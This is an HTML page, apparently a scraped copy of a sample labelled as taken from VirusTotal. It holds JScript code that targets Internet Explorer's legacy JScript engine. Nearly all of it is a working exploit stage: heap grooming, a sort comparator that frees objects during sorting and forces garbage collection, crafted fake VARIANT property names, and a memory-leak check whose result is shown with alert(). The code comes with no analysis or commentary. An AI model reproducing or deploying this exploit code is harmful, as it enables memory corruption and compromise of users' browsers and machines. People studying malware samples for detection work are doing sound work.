202 lines
3.2 KiB
Plaintext
202 lines
3.2 KiB
Plaintext
from virustotal
|
|
https://www.virustotal.com/gui/file/1ad754caa89e08bb10ce538257879d0775bddd8a74b8ff14aaa3d92a2c35b543/detection
|
|
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
|
|
<script language="JScript.Compact">
|
|
|
|
|
|
|
|
var sizeof_WCHAR = 2;
|
|
var sizeof_WORD = 2;
|
|
var sizeof_DWORD = 4;
|
|
var sizeof_PVOID = 4;
|
|
var sizeof_VAR = 0x10;
|
|
var bstrVal = 8;
|
|
var sizeof_RegExpObj = 0xc0;
|
|
var m_pvarMaster = 0x10;
|
|
var m_varCode = 0x38;
|
|
var m_varSrc = 0x48;
|
|
var m_buf_Rsp = 0x10;
|
|
var lshift = 16;
|
|
|
|
|
|
var reSrc = "";
|
|
|
|
|
|
function makeVariant(vt, dword1, dword2) {
|
|
var charCodes = new Array();
|
|
charCodes.push(vt, 0x00, 0x00, 0x00, dword1 & 0xFFFF, (dword1 >> 16) & 0xFFFF, dword2 & 0xFFFF, (dword2 >> 16) & 0xFFFF);
|
|
return String.fromCharCode.apply(null, charCodes);
|
|
}
|
|
|
|
|
|
var objs = new Array();
|
|
var refs = new Array();
|
|
var nrefs = new Array();
|
|
var rrefs = new Array();
|
|
var erefs = new Array();
|
|
var eerefs = new Array();
|
|
var dummyArrs = new Array();
|
|
var propHolders = new Array();
|
|
var refsCount = 0;
|
|
var refsLimit = 2 * 100 - 4;
|
|
var reallocPropertyNameLength = 0x17a;
|
|
var m = new Array();
|
|
var mod_p = 51;
|
|
|
|
if (typeof window != "undefined" && typeof WScript == "undefined") {
|
|
mod_p = 37;
|
|
}
|
|
|
|
if (typeof window == "undefined" && typeof WScript == "undefined") {
|
|
|
|
refsLimit = 100;
|
|
mod_p = 67;
|
|
}
|
|
|
|
for (var i = 0; i < 0x1000; i++) {
|
|
propHolders[i] = new Array();
|
|
}
|
|
|
|
for (var i = 0; i < refsLimit; i++) {
|
|
dummyArrs[i] = new Array(1, 2);
|
|
}
|
|
|
|
var reallocPropertyName = "\u0000\u0000";
|
|
while (reallocPropertyName.length < reallocPropertyNameLength) {
|
|
reallocPropertyName += makeVariant(0x0082);
|
|
}
|
|
reallocPropertyName += "\u0005";
|
|
|
|
function FreeingComparator(a, b) {
|
|
refsCount++;
|
|
|
|
if (refsCount >= refsLimit) {
|
|
|
|
|
|
for (var i = 0; i < 100 * 100; i++) {
|
|
objs[i] = new Object();
|
|
}
|
|
|
|
|
|
for (var i = 0; i < 100 * 100; i++) {
|
|
objs[i] = null;
|
|
}
|
|
|
|
CollectGarbage();
|
|
|
|
|
|
for (var i = 0; i < refsLimit; i++) {
|
|
eerefs[i] = null;
|
|
if (i % mod_p == 0) {
|
|
m[i] = null;
|
|
}
|
|
}
|
|
m = null;
|
|
eerefs = null;
|
|
|
|
|
|
CollectGarbage();
|
|
|
|
|
|
for (var i = 0; i < 0x1000; i++) {
|
|
propHolders[i][reallocPropertyName] = 1;
|
|
}
|
|
}
|
|
else {
|
|
|
|
a = eerefs[refsCount];
|
|
|
|
dummyArrs[refsCount].sort(FreeingComparator);
|
|
|
|
nrefs.push(a);
|
|
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
for (var i = 0; i < refsLimit; i++) {
|
|
rrefs[i] = new RegExp(reSrc);
|
|
}
|
|
|
|
|
|
for (var i = 0; i < refsLimit; i++) {
|
|
var arr = new Array(rrefs[i]);
|
|
var e = new Enumerator(arr);
|
|
e.moveFirst();
|
|
erefs[i] = e.item();
|
|
e = null;
|
|
delete e;
|
|
arr = null;
|
|
delete arr;
|
|
}
|
|
|
|
|
|
for (var i = 0; i < refsLimit; i++) {
|
|
var arr = new Array(rrefs[i]);
|
|
var e = new Enumerator(arr);
|
|
e.moveFirst();
|
|
eerefs[i] = e.item();
|
|
if (i % mod_p == 0) {
|
|
m[i] = new Array();
|
|
}
|
|
e = null;
|
|
delete e;
|
|
arr = null;
|
|
delete arr;
|
|
rrefs[i] = null;
|
|
delete rrefs[i];
|
|
}
|
|
|
|
|
|
|
|
dummyArrs[0].sort(FreeingComparator);
|
|
|
|
|
|
var srcs = new Array();
|
|
|
|
for (var i = 0; i < refsLimit; i++) {
|
|
|
|
try {
|
|
throw erefs[i];
|
|
}
|
|
catch (r) {
|
|
srcs[i] = r.source;
|
|
}
|
|
}
|
|
|
|
var leakIndex = -1;
|
|
|
|
for (var i = 0; i < refsLimit; i++) {
|
|
try {
|
|
|
|
if ((typeof nrefs[i]) === "number") {
|
|
leakIndex = i;
|
|
break;
|
|
}
|
|
}
|
|
catch (e) {
|
|
|
|
}
|
|
}
|
|
|
|
if (leakIndex == -1) {
|
|
throw new Error("e dress.");
|
|
}
|
|
else {
|
|
alert(leakIndex);
|
|
}
|
|
|
|
|
|
|
|
</script>
|
|
</head>
|
|
<body>
|
|
</body>
|
|
</html>
|